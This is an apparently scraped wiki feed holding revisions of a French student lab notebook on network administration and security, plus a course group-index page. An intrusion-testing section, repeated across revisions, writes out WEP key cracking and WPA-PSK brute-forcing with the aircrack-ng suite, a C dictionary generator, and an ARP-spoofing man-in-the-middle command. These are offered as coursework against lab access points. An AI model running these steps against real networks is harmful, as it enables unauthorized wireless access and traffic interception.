Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54770</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54770"/>
				<updated>2020-12-16T13:08:42Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Réalisations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=54499</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=54499"/>
				<updated>2020-12-14T14:11:14Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==A faire==&lt;br /&gt;
&lt;br /&gt;
Chaque binôme peut :&lt;br /&gt;
* '''Compléter les tableaux du plan d'adressage'''&lt;br /&gt;
* Ajouter ses routes sur les 2 routeurs &lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)&lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)&lt;br /&gt;
&lt;br /&gt;
Vous pouvez vous renseigner sur notre wiki.&amp;lt;br/&amp;gt;&lt;br /&gt;
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !&lt;br /&gt;
&lt;br /&gt;
'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''&amp;lt;br/&amp;gt;&lt;br /&gt;
